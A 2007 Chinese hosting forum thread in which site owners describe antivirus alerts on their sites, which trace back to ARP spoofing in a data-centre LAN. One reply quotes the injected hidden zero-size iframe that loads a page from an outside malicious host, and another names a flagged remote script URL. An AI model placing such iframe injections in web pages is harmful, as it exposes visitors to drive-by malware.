发新话题
打印

晚上打开站点,再次拉响警报,X[2],jpg

晚上打开站点,再次拉响警报,X[2],jpg

情况是在三天前出现,咖啡首先报的毒,后来就把FTP里的文件都下到本地
用绿色版AVG跟DR。WEB进行扫毒,结果没查到。就说明问题多半出在服务器
后来几个朋友也出现这种情况,是在同一时间
是什么东西这么顽固?一个图片而已,不会这么死赖的吧?还是哪个兄弟的站被黑了?

[ 本帖最后由 haiwasnm 于 2007-5-5 20:57 编辑 ]

TOP

我前台没有问题,但是后台无法打开,一直出现<iframe  src=http://www.69642.cn/wm/18.htm width=0  height=0 frameborder=0></iframe>                                                                                                     <?xml version="1.0"?>
-------------^
还有其他几个站点也出现同样问题,应该是服务器中毒了吧

TOP

我前台也没问题,后台IE无法打开,FF可以,后台IE提示跟二楼朋友一样。
前台报毒,X[2],jpg

TOP

正考虑买虚拟主机呢,不要吓我哦
你们用的是哪个机房的主机?

TOP

是机房局域网中了 ARP 木马,有某台服务器截取了我们的服务器MAC地址,已经让机房清空 ARP 表,网站都已正常。
只有 cocut.cn 网站,一打开又使大部分网站不正常,怀疑受过木马攻击,故暂停cocut.cn进行检查。

TOP

终于有结果了,反应不错!

TOP

我这里也是碰到这样的问题,打开首页,nod32杀毒软件弹出诸如:ws91.com,http://w.vvcyin.com/ban.js之类的警告!!!到目前为止还是老样子。是我本地机中毒了吗?

TOP

机房终于查到木马源头服务器,把网线拔了,我们终于恢复正常了,呼呼,累!
2个通宵没睡了!!!!!!!!!!!!!!

TOP

我的也重招了,几位的是在撒线路?

TOP

引用:
原帖由 crag 于 2007-5-8 22:04 发表
我的也重招了,几位的是在撒线路?
电信的
你的没中招吧

TOP

我真感到奇怪,国内为什么这么多人写病毒,写木马。说实话,像qq这种,拥有这么大使用群体的软件,做的都跟流氓软件一样。

TOP

发新话题